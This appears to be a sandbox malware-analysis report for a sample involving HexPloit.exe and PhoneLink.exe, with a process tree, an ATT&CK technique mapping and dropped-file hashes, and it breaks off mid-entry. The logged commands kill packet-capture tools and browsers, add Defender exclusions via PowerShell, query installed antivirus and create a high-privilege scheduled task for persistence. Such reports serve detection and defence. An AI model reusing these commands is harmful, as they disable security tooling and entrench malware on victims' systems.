C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:772

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:2364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:2848

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:1988

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:5196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:2100

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:5356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:5776

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:2756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:4996

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:5392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:3300

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:3592

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
13⤵
PID:2628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
12⤵
PID:5744

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
13⤵
PID:2664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
12⤵
PID:1540

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
13⤵
PID:5296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
12⤵
PID:1016

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
13⤵
PID:908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
12⤵
PID:4968

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
13⤵
PID:4180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
12⤵
PID:464

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
13⤵
PID:2348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
12⤵
PID:2816

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
13⤵
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
12⤵
PID:5364

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
13⤵
PID:3772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
12⤵
PID:5360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath C:\path\to\exclude"
11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
11⤵
PID:4252

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:3124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
11⤵
PID:5400

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:6100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
11⤵
PID:3944

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
11⤵
PID:6108

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:3868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
11⤵
PID:3440

C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
11⤵
PID:2464

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
11⤵
PID:4068

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:3556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
11⤵
PID:3820

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:5416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
11⤵
PID:2816

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
11⤵
PID:1424

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
11⤵
PID:6100

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:5084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
11⤵
PID:5972

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
11⤵
PID:5356

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:5784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
11⤵
PID:3376

C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:5724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
11⤵
PID:5852

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:5272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
11⤵
PID:2100

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
11⤵
PID:6056

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:5252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
11⤵
PID:5748

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
11⤵
PID:5228

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
11⤵
PID:1224

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
11⤵
PID:1312

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:3800

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:2984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
11⤵
PID:5288

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:952

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
12⤵
- Suspicious use of AdjustPrivilegeToken
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
11⤵
PID:3548

C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
12⤵
PID:1136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
11⤵
PID:232

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
12⤵
PID:416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
11⤵
PID:5900

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
12⤵
PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
11⤵
PID:1556

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
12⤵
PID:248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
11⤵
PID:4576

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
12⤵
PID:1696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
11⤵
PID:4364

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
12⤵
PID:5896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
11⤵
PID:1048

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
12⤵
PID:5648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
11⤵
PID:3932

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:3884

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
12⤵
PID:2456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
11⤵
PID:2028

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
12⤵
PID:4440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
11⤵
PID:5748

C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
12⤵
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
11⤵
PID:1212

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
12⤵
PID:1412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
11⤵
PID:404

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
12⤵
PID:2768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
11⤵
PID:2328

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
12⤵
- Kills process with taskkill
PID:3940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
11⤵
PID:5836

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
12⤵
PID:576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
11⤵
PID:5280

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
12⤵
PID:916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
11⤵
PID:2168

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
12⤵
PID:4432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
11⤵
PID:4680

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
12⤵
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
11⤵
PID:3416

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:3548

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
12⤵
PID:4132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
11⤵
PID:4340

C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
12⤵
PID:4916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
11⤵
PID:5596

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
12⤵
PID:2900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
11⤵
PID:1988

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
12⤵
PID:5384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
11⤵
PID:5144

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
12⤵
PID:772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
11⤵
PID:560

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
12⤵
PID:5988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
11⤵
PID:3556

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
12⤵
PID:3480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
11⤵
PID:460

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
12⤵
PID:3424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
11⤵
PID:2696

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
12⤵
PID:1540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
11⤵
PID:4528

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
12⤵
PID:2228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
11⤵
PID:3512

C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
12⤵
PID:2956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
11⤵
PID:3992

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
12⤵
PID:4488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
11⤵
PID:4268

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:2344

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
12⤵
PID:1424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
11⤵
PID:1596

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
12⤵
PID:960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
11⤵
PID:5280

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
12⤵
PID:5056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
11⤵
PID:5288

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
12⤵
PID:1180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
11⤵
PID:1520

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:4212

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
12⤵
PID:5940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
11⤵
PID:1824

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:804

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
12⤵
PID:5052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
11⤵
PID:1220

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
12⤵
PID:2900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
11⤵
PID:5784

C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
12⤵
PID:4480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
11⤵
PID:1988

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
12⤵
PID:5532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
11⤵
PID:2108

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
12⤵
PID:3328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
11⤵
PID:5036

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
12⤵
PID:2464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
11⤵
PID:4784

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
12⤵
PID:780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
11⤵
PID:4968

C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
12⤵
PID:4852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
11⤵
PID:6012

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:4640

C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
12⤵
PID:5936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
11⤵
PID:2228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:3600

C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
12⤵
PID:784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
11⤵
PID:4556

C:\Windows\system32\taskkill.exe
taskkill /F /IM opera.exe
12⤵
PID:1412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
11⤵
PID:3992

C:\Windows\system32\taskkill.exe
taskkill /F /IM yandex.exe
12⤵
PID:2368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
11⤵
PID:576

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:1356

C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
12⤵
PID:2172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
11⤵
PID:976

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:916

C:\Windows\system32\taskkill.exe
taskkill /F /IM brave.exe
12⤵
PID:2168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
11⤵
PID:4428

C:\Windows\system32\taskkill.exe
taskkill /F /IM vivaldi.exe
12⤵
PID:5124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
11⤵
PID:3792

C:\Windows\system32\taskkill.exe
taskkill /F /IM Telegram.exe
12⤵
PID:2176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
11⤵
PID:1648

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
12⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\HexPloit.exe
"C:\Users\Admin\AppData\Local\Temp\HexPloit.exe"
6⤵
- Executes dropped EXE
PID:5376

C:\Users\Admin\AppData\Local\Temp\onefile_5376_133641606132078958\nexusloader.exe
"C:\Users\Admin\AppData\Local\Temp\HexPloit.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4592

C:\Users\Admin\AppData\Local\Temp\PhoneLink.exe
"C:\Users\Admin\AppData\Local\Temp\PhoneLink.exe"
6⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:1036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PhoneLink.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PhoneLink.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\PhoneLink.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PhoneLink.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6012

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PhoneLink" /tr "C:\ProgramData\PhoneLink.exe"
7⤵
- Scheduled Task/Job: Scheduled Task
PID:460

C:\ProgramData\PhoneLink.exe
C:\ProgramData\PhoneLink.exe
1⤵
- Executes dropped EXE
PID:5036

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Scheduled Task/Job

Scheduled Task

Persistence

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7-zip.dll
Filesize
99KB

MD5
8af282b10fd825dc83d827c1d8d23b53

SHA1
17c08d9ad0fb1537c7e6cb125ec0acbc72f2b355

SHA256
1c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca

SHA512
cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
64f055a833e60505264595e7edbf62f6

SHA1
dad32ce325006c1d094b7c07550aca28a8dac890

SHA256
7172dc46924936b8dcee2d0c39535d098c2dbf510402c5bbb269399aed4d4c99

SHA512
86644776207d0904bc3293b4fec2fa724b8b3c9c3086cd0ef2696027ab3d840a8049b6bde3464c209e57ffa83cbc3df6115500fbe36a9acb222830c1aac4dc7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
a74887034b3a720c50e557d5b1c790bf

SHA1
fb245478258648a65aa189b967590eef6fb167be

SHA256
f25b27187fad2b82ac76fae98dfdddc1c04f4e8370d112d45c1dd17a8908c250

SHA512
888c3fceb1a28a41c5449f5237ca27c7cbd057ce407f1542973478a31aa84ce9b77943130ca37551c31fa7cd737b9195b7374f886a969b39148a531530a91af3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
Filesize
67KB

MD5
9e3f75f0eac6a6d237054f7b98301754

SHA1
80a6cb454163c3c11449e3988ad04d6ad6d2b432

SHA256
33a84dec02c65acb6918a1ae82afa05664ee27ad2f07760e8b008636510fd5bf

SHA512
5cea53f27a4fdbd32355235c90ce3d9b39f550a1b070574cbc4ea892e9901ab0acace0f8eeb5814515ca6ff2970bc3cc0559a0c87075ac4bb3251bc8eaee6236

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e
Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f
Filesize
41KB

MD5
b15016a51bd29539b8dcbb0ce3c70a1b

SHA1
4eab6d31dea4a783aae6cabe29babe070bd6f6f0

SHA256
e72c68736ce86ec9e3785a89f0d547b4993d5a2522a33104eeb7954eff7f488a

SHA512
1c74e4d2895651b9ab86158396bcce27a04acfb5655a32a28c37ee0ebd66cd044c3c895db7e14acc41a93db55463310425c188a7c503f0308ce894cf93df219f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010
Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011
Filesize
84KB

MD5
74e33b4b54f4d1f3da06ab47c5936a13

SHA1
6e5976d593b6ee3dca3c4dbbb90071b76e1cd85c

SHA256
535fc48679c38decd459ad656bdd6914e539754265244d0cc7b1da6bddf3e287

SHA512
